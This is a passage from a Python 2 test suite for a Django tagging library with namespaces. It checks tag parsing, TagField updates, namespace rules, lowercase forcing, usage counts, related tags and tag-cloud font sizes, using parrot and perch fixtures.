self.assertEquals(len(tags), 1)
self.assertEquals(unicode(tags[0]), u'ŠĐĆŽćžšđ')
Tag.objects.update_tags(self.dead_parrot, u'你好')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 1)
self.assertEquals(unicode(tags[0]), u'你好')
Tag.objects.update_tags(self.dead_parrot, u'ŠĐĆŽćžšđ', default_namespace=u'你好')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 1)
self.assertEquals(unicode(tags[0]), u'你好:ŠĐĆŽćžšđ')
def test_update_tags_with_none(self):
# start off in a known, mildly interesting state
Tag.objects.update_tags(self.dead_parrot, 'foo bar baz')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('foo') in tags)
Tag.objects.update_tags(self.dead_parrot, None)
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 0)
class TestModelTagField(TestCase):
""" Test the 'tags' field on models. """
def setUp(self):
self.original_stderr = sys.stderr
def tearDown(self):
sys.stderr = self.original_stderr
def test_create_with_tags_specified(self):
f1 = FormTest.objects.create(tags=u'test3 test2 test1 one:"two three"=four')
tags = Tag.objects.get_for_object(f1)
test1_tag = get_tag('test1')
test2_tag = get_tag('test2')
test3_tag = get_tag('test3')
one_tag = get_tag('one:"two three"=four')
self.failUnless(None not in (test1_tag, test2_tag, test3_tag, one_tag))
self.assertEquals(len(tags), 4)
self.failUnless(test1_tag in tags)
self.failUnless(test2_tag in tags)
self.failUnless(test3_tag in tags)
self.failUnless(one_tag in tags)
def test_update_via_tags_field(self):
f1 = FormTest.objects.create(tags=u'test3 test2 test1')
tags = Tag.objects.get_for_object(f1)
test1_tag = get_tag('test1')
test2_tag = get_tag('test2')
test3_tag = get_tag('test3')
self.failUnless(None not in (test1_tag, test2_tag, test3_tag))
self.assertEquals(len(tags), 3)
self.failUnless(test1_tag in tags)
self.failUnless(test2_tag in tags)
self.failUnless(test3_tag in tags)
f1.tags = u'test4'
f1.save()
tags = Tag.objects.get_for_object(f1)
test4_tag = get_tag('test4')
self.assertEquals(len(tags), 1)
self.assertEquals(tags[0], test4_tag)
f1.tags = u'foo:bar'
f1.save()
tags = Tag.objects.get_for_object(f1)
foo_bar_tag = get_tag('foo:bar')
self.assertEquals(len(tags), 1)
self.assertEquals(tags[0], foo_bar_tag)
f1.tags = ''
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 0)
def test_single_tagfield_without_namespace(self):
f1 = FormTest.objects.create(
tags=u'tag1 foo:tag2 :tag3 ""tag""4=value')
tags = Tag.objects.get_for_object(f1)
tag1 = get_tag('tag1')
tag2 = get_tag('foo:tag2')
tag3 = get_tag('tag3')
tag4 = get_tag('tag4=value')
self.failUnless(None not in (tag1, tag2, tag3, tag4))
self.assertEquals(len(tags), 4)
self.failUnless(tag1 in tags)
self.failUnless(tag2 in tags)
self.failUnless(tag3 in tags)
self.failUnless(tag4 in tags)
self.assertEquals(FormTest.tags, u'tag1 tag3 tag4=value foo:tag2')
# Returns the exact input string. Only works if there is one tagfield
# on the model which also must have not a namespace assigned.
self.assertEquals(f1.tags, u'tag1 foo:tag2 :tag3 ""tag""4=value')
f1.tags = None
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 0)
self.assertEquals(f1.tags, u'')
f1.tags = u'tag3 foo:tag2'
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 2)
self.failUnless(tag2 in tags)
self.failUnless(tag3 in tags)
f1 = FormTest.objects.get(pk=f1.pk)
self.assertEquals(f1.tags, u'tag3 foo:tag2')
self.assertEquals(FormTest.tags, u'tag3 foo:tag2')
def test_tagfield_with_namespace(self):
f1 = DefaultNamespaceTest.objects.create(
categories=u'cat1 :cat2 category:cat3 foo:cat4')
tags = Tag.objects.get_for_object(f1)
cat1 = get_tag('category:cat1')
cat2 = get_tag('cat2')
cat3 = get_tag('category:cat3')
cat4 = get_tag('foo:cat4')
self.failUnless(None not in (cat1, cat3))
self.failUnless(None is cat2)
self.failUnless(None is cat4)
self.assertEquals(len(tags), 2)
self.failUnless(cat1 in tags)
self.failUnless(cat3 in tags)
# not all tags of this model are shown
self.assertEquals(DefaultNamespaceTest.categories, u'cat1 cat3')
tag1 = Tag.objects.create(name='tag1')
Tag.objects.add_tag(f1, unicode(tag1))
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 3)
self.failUnless(cat1 in tags)
self.failUnless(cat3 in tags)
self.failUnless(tag1 in tags)
# not all tags of this model are shown
self.assertEquals(DefaultNamespaceTest.categories, u'cat1 cat3')
f1 = DefaultNamespaceTest.objects.get(pk=f1.pk)
self.assertEquals(f1.categories, u'cat1 cat3')
f1.categories = u'cat1'
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 2)
self.failUnless(cat1 in tags)
self.failUnless(tag1 in tags)
f1.categories = u':cat2'
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 1)
self.failUnless(tag1 in tags)
f1.categories = None
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 1)
self.failUnless(tag1 in tags)
f2 = DefaultNamespaceTest.objects.create()
self.assertEquals(f2.categories, u'')
f2.categories = 'cat5'
f2.save()
tags = Tag.objects.get_for_object(f2)
cat5 = get_tag('category:cat5')
self.assertEquals(len(tags), 1)
self.failUnless(cat5 in tags)
f1 = DefaultNamespaceTest.objects.get(pk=f1.pk)
f2 = DefaultNamespaceTest.objects.get(pk=f2.pk)
self.assertEquals(f1.categories, u'')
self.assertEquals(f2.categories, u'cat5')
self.assertEquals(DefaultNamespaceTest.categories, u'cat5')
def test_tagfield_and_tagfield_with_namespace(self):
f1 = DefaultNamespaceTest2.objects.create(
tags=u'tag1 :tag2 category:tag3 foo:tag4',
categories=u'cat1 :cat2 category:cat3 foo:cat4')
tags = Tag.objects.get_for_object(f1)
tag1 = get_tag('tag1')
tag2 = get_tag('tag2')
tag3 = get_tag('category:tag3')
tag4 = get_tag('foo:tag4')
cat1 = get_tag('category:cat1')
cat2 = get_tag('cat2')
cat3 = get_tag('category:cat3')
cat4 = get_tag('foo:cat4')
self.failUnless(None not in (tag1, tag2, tag4, cat1, cat3))
self.failUnless(tag3 is None)
self.failUnless(cat2 is None)
self.failUnless(cat4 is None)
self.assertEquals(len(tags), 5)
self.failUnless(tag1 in tags)
self.failUnless(tag2 in tags)
self.failUnless(tag4 in tags)
self.failUnless(cat1 in tags)
self.failUnless(cat3 in tags)
self.assertEquals(DefaultNamespaceTest2.tags, u'tag1 tag2 foo:tag4')
self.assertEquals(DefaultNamespaceTest2.categories, u'cat1 cat3')
f1 = DefaultNamespaceTest2.objects.get(pk=f1.pk)
self.assertEquals(f1.tags, u'foo:tag4 tag1 tag2')
self.assertEquals(f1.categories, u'cat1 cat3')
f1.tags = u'tag1'
f1.categories = u'cat1'
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 2)
self.failUnless(tag1 in tags)
self.failUnless(cat1 in tags)
self.assertEquals(f1.tags, u'tag1')
self.assertEquals(f1.categories, u'cat1')
f1.tags = u'category:cat1'
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 1)
self.failUnless(cat1 in tags)
self.assertEquals(f1.tags, u'')
self.assertEquals(f1.categories, u'cat1')
f1.tags = u'cat2'
f1.categories = u':cat2'
f1.save()
cat2 = get_tag('cat2')
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 1)
self.failUnless(cat2 in tags)
self.assertEquals(f1.tags, u'cat2')
self.assertEquals(f1.categories, u'')
f1.tags = None
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 0)
self.assertEquals(f1.tags, u'')
self.assertEquals(f1.categories, u'')
# Now its gone.
f1.tags = None
f1.categories = None
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 0)
self.assertEquals(f1.tags, u'')
self.assertEquals(f1.categories, u'')
f2 = DefaultNamespaceTest2.objects.create()
self.assertEquals(f2.tags, u'')
self.assertEquals(f2.categories, u'')
f2.tags = 'tag5'
f2.categories = 'cat5'
f2.save()
tags = Tag.objects.get_for_object(f2)
tag5 = get_tag('tag5')
cat5 = get_tag('category:cat5')
self.assertEquals(len(tags), 2)
self.failUnless(tag5 in tags)
self.failUnless(cat5 in tags)
f1 = DefaultNamespaceTest2.objects.get(pk=f1.pk)
f2 = DefaultNamespaceTest2.objects.get(pk=f2.pk)
self.assertEquals(f1.tags, u'')
self.assertEquals(f1.categories, u'')
self.assertEquals(f2.tags, u'tag5')
self.assertEquals(f2.categories, u'cat5')
self.assertEquals(DefaultNamespaceTest2.tags, u'tag5')
self.assertEquals(DefaultNamespaceTest2.categories, u'cat5')
def test_multiple_tagfields_with_namespace(self):
f1 = DefaultNamespaceTest3.objects.create(
foos=u'foo1 :foo2 category:foo3 foo:foo4',
categories=u'cat1 :cat2 category:cat3 foo:cat4')
tags = Tag.objects.get_for_object(f1)
foo1 = get_tag('foo:foo1')
foo2 = get_tag('foo2')
foo3 = get_tag('category:foo3')
foo4 = get_tag('foo:foo4')
cat1 = get_tag('category:cat1')
cat2 = get_tag('cat2')
cat3 = get_tag('category:cat3')
cat4 = get_tag('foo:cat4')
self.failUnless(None not in (foo1, foo4, cat1, cat3))
self.failUnless(foo2 is None)
self.failUnless(foo3 is None)
self.failUnless(cat2 is None)
self.failUnless(cat4 is None)
self.assertEquals(len(tags), 4)
self.failUnless(foo1 in tags)
self.failUnless(foo4 in tags)
self.failUnless(cat1 in tags)
self.failUnless(cat3 in tags)
self.assertEquals(DefaultNamespaceTest3.foos, u'foo1 foo4')
self.assertEquals(DefaultNamespaceTest3.categories, u'cat1 cat3')
f1 = DefaultNamespaceTest3.objects.get(pk=f1.pk)
self.assertEquals(f1.foos, u'foo1 foo4')
self.assertEquals(f1.categories, u'cat1 cat3')
f1.foos = u'foo1'
f1.categories = u'cat1'
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 2)
self.failUnless(foo1 in tags)
self.failUnless(cat1 in tags)
self.assertEquals(f1.foos, u'foo1')
self.assertEquals(f1.categories, u'cat1')
f1.foos = u'category:cat1'
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 1)
self.failUnless(cat1 in tags)
self.assertEquals(f1.foos, u'')
self.assertEquals(f1.categories, u'cat1')
f1.foos = u'cat4'
f1.categories = u':cat2'
f1.save()
cat4 = get_tag('foo:cat4')
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 1)
self.failUnless(cat4 in tags)
self.assertEquals(f1.foos, u'cat4')
self.assertEquals(f1.categories, u'')
f1.foos = None
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 0)
self.assertEquals(f1.foos, u'')
self.assertEquals(f1.categories, u'')
f1.foos = None
f1.categories = None
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 0)
self.assertEquals(f1.foos, u'')
self.assertEquals(f1.categories, u'')
f2 = DefaultNamespaceTest3.objects.create()
self.assertEquals(f2.foos, u'')
self.assertEquals(f2.categories, u'')
f2.foos = 'foo5'
f2.categories = 'cat5'
f2.save()
tags = Tag.objects.get_for_object(f2)
foo5 = get_tag('foo:foo5')
cat5 = get_tag('category:cat5')
self.assertEquals(len(tags), 2)
self.failUnless(foo5 in tags)
self.failUnless(cat5 in tags)
f1 = DefaultNamespaceTest3.objects.get(pk=f1.pk)
f2 = DefaultNamespaceTest3.objects.get(pk=f2.pk)
self.assertEquals(f1.foos, u'')
self.assertEquals(f1.categories, u'')
self.assertEquals(f2.foos, u'foo5')
self.assertEquals(f2.categories, u'cat5')
self.assertEquals(DefaultNamespaceTest3.foos, u'foo5')
self.assertEquals(DefaultNamespaceTest3.categories, u'cat5')
def test_model_tag_field_definition_validation(self):
from StringIO import StringIO
sys.stderr = StringIO()
from tagging.fields import TagField
try:
class Model(models.Model):
tags = TagField(namespace='foo')
foos = TagField(namespace='foo')
except SystemExit, e:
pass
else:
self.fail(
u'Validation of model fields failed. '
u'A namespace is only allowed once. '
)
def test_update_via_tags(self):
f1 = FormTest.objects.create(tags=u'one two three')
Tag.objects.get(name='three').delete()
t2 = Tag.objects.get(name='two')
t2.name = 'new'
t2.save()
f1again = FormTest.objects.get(pk=f1.pk)
self.failIf('three' in f1again.tags)
self.failIf('two' in f1again.tags)
self.failUnless('new' in f1again.tags)
def test_creation_without_specifying_tags(self):
f1 = FormTest()
self.assertEquals(f1.tags, '')
def test_creation_with_nullable_tags_field(self):
f1 = FormTestNull()
self.assertEquals(f1.tags, '')
class TestSettings(TestCase):
def setUp(self):
self.original_force_lower_case_tags = conf.FORCE_LOWERCASE_TAGS
self.dead_parrot = Parrot.objects.create(state='dead')
def tearDown(self):
conf.FORCE_LOWERCASE_TAGS = self.original_force_lower_case_tags
def test_force_lowercase_tags(self):
""" Test forcing tags to lowercase. """
conf.FORCE_LOWERCASE_TAGS = True
Tag.objects.update_tags(self.dead_parrot, 'foO bAr Ter')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 3)
foo_tag = get_tag('foo')
bar_tag = get_tag('bar')
ter_tag = get_tag('ter')
self.failUnless(foo_tag in tags)
self.failUnless(bar_tag in tags)
self.failUnless(ter_tag in tags)
Tag.objects.update_tags(self.dead_parrot, 'foO bAr baZ')
tags = Tag.objects.get_for_object(self.dead_parrot)
baz_tag = get_tag('baz')
self.assertEquals(len(tags), 3)
self.failUnless(bar_tag in tags)
self.failUnless(baz_tag in tags)
self.failUnless(foo_tag in tags)
Tag.objects.add_tag(self.dead_parrot, 'FOO')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(bar_tag in tags)
self.failUnless(baz_tag in tags)
self.failUnless(foo_tag in tags)
Tag.objects.add_tag(self.dead_parrot, 'Zip')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 4)
zip_tag = get_tag('zip')
self.failUnless(bar_tag in tags)
self.failUnless(baz_tag in tags)
self.failUnless(foo_tag in tags)
self.failUnless(zip_tag in tags)
Tag.objects.add_tag(self.dead_parrot, 'Foo:bAr=ziP')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 5)
foo_bar_zip_tag = get_tag('foo:bar=zip')
self.failUnless(bar_tag in tags)
self.failUnless(baz_tag in tags)
self.failUnless(foo_tag in tags)
self.failUnless(zip_tag in tags)
self.failUnless(foo_bar_zip_tag in tags)
f1 = FormTest.objects.create()
f1.tags = u'TEST5'
f1.save()
tags = Tag.objects.get_for_object(f1)
test5_tag = get_tag('test5')
self.assertEquals(len(tags), 1)
self.failUnless(test5_tag in tags)
self.assertEquals(f1.tags, u'test5')
f1.tags = u'TEST5 FOO:BAR=TAR'
f1.save()
tags = Tag.objects.get_for_object(f1)
foo_bar_tar_tag = get_tag('foo:bar=tar')
self.assertEquals(len(tags), 2)
self.failUnless(test5_tag in tags)
self.failUnless(foo_bar_tar_tag in tags)
self.assertEquals(f1.tags, u'test5 foo:bar=tar')
class TestTagUsageForModelBaseCase(TestCase):
def test_tag_usage_for_model_empty(self):
self.assertEquals(Tag.objects.usage_for_model(Parrot), [])
class TestTagUsageForModel(TestCase):
def setUp(self):
parrot_details = (
('pining for the fjords', 9, True, 'foo bar foo:bar=egg'),
('passed on', 6, False, 'bar baz ter'),
('no more', 4, True, 'foo ter foo:bar=egg'),
('late', 2, False, 'bar ter foo:bar'),
)
for state, perch_size, perch_smelly, tags in parrot_details:
perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
parrot = Parrot.objects.create(state=state, perch=perch)
Tag.objects.update_tags(parrot, tags)
def test_tag_usage_for_model(self):
tag_usage = Tag.objects.usage_for_model(Parrot, counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 6)
self.failUnless((u'bar', 3) in relevant_attribute_list)
self.failUnless((u'baz', 1) in relevant_attribute_list)
self.failUnless((u'foo', 2) in relevant_attribute_list)
self.failUnless((u'ter', 3) in relevant_attribute_list)
self.failUnless((u'foo:bar=egg', 2) in relevant_attribute_list)
self.failUnless((u'foo:bar', 1) in relevant_attribute_list)
def test_tag_usage_for_model_with_min_count(self):
tag_usage = Tag.objects.usage_for_model(Parrot, min_count = 2)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 4)
self.failUnless((u'bar', 3) in relevant_attribute_list)
self.failUnless((u'foo', 2) in relevant_attribute_list)
self.failUnless((u'ter', 3) in relevant_attribute_list)
self.failUnless((u'foo:bar=egg', 2) in relevant_attribute_list)
def test_tag_usage_with_filter_on_model_objects(self):
tag_usage = Tag.objects.usage_for_model(Parrot, counts=True, filters=dict(state='no more'))
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 3)
self.failUnless((u'foo', 1) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
self.failUnless((u'foo:bar=egg', 1) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_model(Parrot, counts=True, filters=dict(state__startswith='p'))
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'bar', 2) in relevant_attribute_list)
self.failUnless((u'baz', 1) in relevant_attribute_list)
self.failUnless((u'foo', 1) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
self.failUnless((u'foo:bar=egg', 1) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_model(Parrot, counts=True, filters=dict(perch__size__gt=4))
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'bar', 2) in relevant_attribute_list)
self.failUnless((u'baz', 1) in relevant_attribute_list)
self.failUnless((u'foo', 1) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
self.failUnless((u'foo:bar=egg', 1) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_model(Parrot, counts=True, filters=dict(perch__smelly=True))
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 4)
self.failUnless((u'bar', 1) in relevant_attribute_list)
self.failUnless((u'foo', 2) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
self.failUnless((u'foo:bar=egg', 2) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_model(Parrot, min_count=2, filters=dict(perch__smelly=True))
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 2)
self.failUnless((u'foo', 2) in relevant_attribute_list)
self.failUnless((u'foo:bar=egg', 2) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_model(Parrot, filters=dict(perch__size__gt=4))
relevant_attribute_list = [(unicode(tag), hasattr(tag, 'counts')) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'bar', False) in relevant_attribute_list)
self.failUnless((u'baz', False) in relevant_attribute_list)
self.failUnless((u'foo', False) in relevant_attribute_list)
self.failUnless((u'ter', False) in relevant_attribute_list)
self.failUnless((u'foo:bar=egg', False) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_model(Parrot, filters=dict(perch__size__gt=99))
relevant_attribute_list = [(unicode(tag), hasattr(tag, 'counts')) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 0)
class TestTagsRelatedForModel(TestCase):
def setUp(self):
parrot_details = (
('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
('passed on', 6, False, 'bar baz ter'),
('no more', 4, True, 'foo ter spam:egg=ham'),
('late', 2, False, 'bar ter spam:foo'),
)
for state, perch_size, perch_smelly, tags in parrot_details:
perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
parrot = Parrot.objects.create(state=state, perch=perch)
Tag.objects.update_tags(parrot, tags)
def test_related_for_model_with_tag_query_sets_as_input(self):
related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['bar']), Parrot, counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'baz', 1) in relevant_attribute_list)
self.failUnless((u'foo', 1) in relevant_attribute_list)
self.failUnless((u'ter', 2) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['bar']), Parrot, min_count=2)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 1)
self.failUnless((u'ter', 2) in relevant_attribute_list)
related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['bar']), Parrot, counts=False)
relevant_attribute_list = [(unicode(tag), hasattr(tag, 'count')) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'baz', False) in relevant_attribute_list)
self.failUnless((u'foo', False) in relevant_attribute_list)
self.failUnless((u'ter', False) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', False) in relevant_attribute_list)
self.failUnless((u'spam:foo', False) in relevant_attribute_list)
related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['bar', 'ter']), Parrot, counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 2)
self.failUnless((u'baz', 1) in relevant_attribute_list)
self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['bar', 'ter', 'baz']), Parrot, counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 0)
related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['foo']), Parrot, counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 0)
related_tags = Tag.objects.related_for_model(Tag.objects.filter(name__in=['foo'], namespace=None), Parrot, counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 3)
self.failUnless((u'bar', 1) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 2) in relevant_attribute_list)
related_tags = Tag.objects.related_for_model(Tag.objects.filter(namespace__in=['spam']), Parrot, counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 0)
related_tags = Tag.objects.related_for_model(Tag.objects.filter(value__in=['ham']), Parrot, counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 3)
self.failUnless((u'bar', 1) in relevant_attribute_list)
self.failUnless((u'foo', 2) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
def test_related_for_model_with_tag_strings_as_input(self):
# Once again, with feeling (strings)
related_tags = Tag.objects.related_for_model('bar', Parrot, counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'baz', 1) in relevant_attribute_list)
self.failUnless((u'foo', 1) in relevant_attribute_list)
self.failUnless((u'ter', 2) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
related_tags = Tag.objects.related_for_model('spam:egg=ham', Parrot, counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 3)
self.failUnless((u'foo', 2) in relevant_attribute_list)
self.failUnless((u'bar', 1) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
related_tags = Tag.objects.related_for_model('bar', Parrot, min_count=2)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 1)
self.failUnless((u'ter', 2) in relevant_attribute_list)
related_tags = Tag.objects.related_for_model('bar', Parrot, counts=False)
relevant_attribute_list = [(unicode(tag), hasattr(tag, 'count')) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'baz', False) in relevant_attribute_list)
self.failUnless((u'foo', False) in relevant_attribute_list)
self.failUnless((u'ter', False) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', False) in relevant_attribute_list)
self.failUnless((u'spam:foo', False) in relevant_attribute_list)
related_tags = Tag.objects.related_for_model(['bar', 'ter'], Parrot, counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 2)
self.failUnless((u'baz', 1) in relevant_attribute_list)
self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
related_tags = Tag.objects.related_for_model(['bar', 'ter', 'baz'], Parrot, counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 0)
class TestTagsCalculateCloud(TestCase):
def setUp(self):
parrot_details = (
('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
('passed on', 6, False, 'bar baz ter'),
('no more', 4, True, 'bar foo ter spam:egg=ham'),
('late', 2, False, 'bar ter spam:foo'),
)
for state, perch_size, perch_smelly, tags in parrot_details:
perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
parrot = Parrot.objects.create(state=state, perch=perch)
Tag.objects.update_tags(parrot, tags)
def test_tag_manager_calculate_cloud_method(self):
cloud_tags = Tag.objects.cloud_for_model(Parrot)
relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
self.assertEquals(len(relevant_attribute_list), 6)
self.failUnless((u'bar', 4, 4) in relevant_attribute_list)
self.failUnless((u'ter', 3, 3) in relevant_attribute_list)
self.failUnless((u'foo', 2, 2) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 2, 2) in relevant_attribute_list)
self.failUnless((u'baz', 1, 1) in relevant_attribute_list)
self.failUnless((u'spam:foo', 1, 1) in relevant_attribute_list)
cloud_tags = Tag.objects.cloud_for_model(Parrot, steps=10)
relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
self.assertEquals(len(relevant_attribute_list), 6)
self.failUnless((u'bar', 4, 10) in relevant_attribute_list)
self.failUnless((u'ter', 3, 8) in relevant_attribute_list)
self.failUnless((u'foo', 2, 4) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 2, 4) in relevant_attribute_list)
self.failUnless((u'baz', 1, 1) in relevant_attribute_list)
self.failUnless((u'spam:foo', 1, 1) in relevant_attribute_list)
cloud_tags = Tag.objects.cloud_for_model(Parrot, steps=10, distribution=LINEAR)
relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
self.assertEquals(len(relevant_attribute_list), 6)
self.failUnless((u'bar', 4, 10) in relevant_attribute_list)
self.failUnless((u'ter', 3, 7) in relevant_attribute_list)
self.failUnless((u'foo', 2, 4) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 2, 4) in relevant_attribute_list)
self.failUnless((u'baz', 1, 1) in relevant_attribute_list)
self.failUnless((u'spam:foo', 1, 1) in relevant_attribute_list)
cloud_tags = Tag.objects.cloud_for_model(Parrot, min_count=2)
relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
self.assertEquals(len(relevant_attribute_list), 4)
self.failUnless((u'bar', 4, 4) in relevant_attribute_list)
self.failUnless((u'ter', 3, 3) in relevant_attribute_list)
self.failUnless((u'foo', 2, 1) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 2, 1) in relevant_attribute_list)
cloud_tags = Tag.objects.cloud_for_model(Parrot, min_count=4)
relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
self.assertEquals(len(relevant_attribute_list), 1)
self.failUnless((u'bar', 4, 1) in relevant_attribute_list)
cloud_tags = Tag.objects.cloud_for_model(Parrot, filters=dict(state__startswith='p'))
relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'bar', 2, 4) in relevant_attribute_list)
self.failUnless((u'ter', 1, 1) in relevant_attribute_list)
self.failUnless((u'foo', 1, 1) in relevant_attribute_list)
self.failUnless((u'baz', 1, 1) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 1, 1) in relevant_attribute_list)
class TestGetTaggedObjectsByModel(TestCase):
def setUp(self):
parrot_details = (
('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
('passed on', 6, False, 'bar baz ter'),
('no more', 4, True, 'foo ter spam:egg=ham'),
('late', 2, False, 'bar ter spam:foo'),
)
for state, perch_size, perch_smelly, tags in parrot_details:
perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
parrot = Parrot.objects.create(state=state, perch=perch)
Tag.objects.update_tags(parrot, tags)
self.foo = Tag.objects.get(namespace=None, name='foo', value=None)
self.bar = Tag.objects.get(namespace=None, name='bar', value=None)
self.baz = Tag.objects.get(namespace=None, name='baz', value=None)
self.ter = Tag.objects.get(namespace=None, name='ter', value=None)
self.spameggham = Tag.objects.get(namespace='spam', name='egg', value='ham')
